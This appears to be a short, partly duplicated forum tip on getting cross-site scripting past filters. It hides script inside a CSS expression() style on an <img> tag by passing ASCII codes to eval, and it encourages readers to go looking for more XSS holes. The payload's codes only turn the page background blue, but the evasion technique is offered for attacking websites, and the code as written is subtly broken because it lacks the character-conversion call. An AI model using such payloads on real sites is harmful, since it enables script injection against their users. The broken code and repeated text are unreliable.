Many programs of expression CSS properties are not filtered well and are easily crossed. If you don’t know how to use it, please refer to the cross-site script vulnerability testing process of Jianxin’s Phantom Forum.
What I want to talk about here is another method, using the method to convert ASCⅡ code into characters and then execute with the EVAL function.
<img src="#" style="Xss:expression(eval(
(100,111,99,117,109,101,110,116,46,98,103,67,111,108,111,114,61,34,98,108,117,101,34)));">
Hehe, a lot of XSS is waiting for you to dig, ENJOY IT :)
What I want to talk about here is another method, using the method to convert ASCⅡ code into characters and then execute with the EVAL function.
<img src="#" style="Xss:expression(eval(
(100,111,99,117,109,101,110,116,46,98,103,67,111,108,111,114,61,34,98,108,117,101,34)));">
Hehe, a lot of XSS is waiting for you to dig, ENJOY IT :)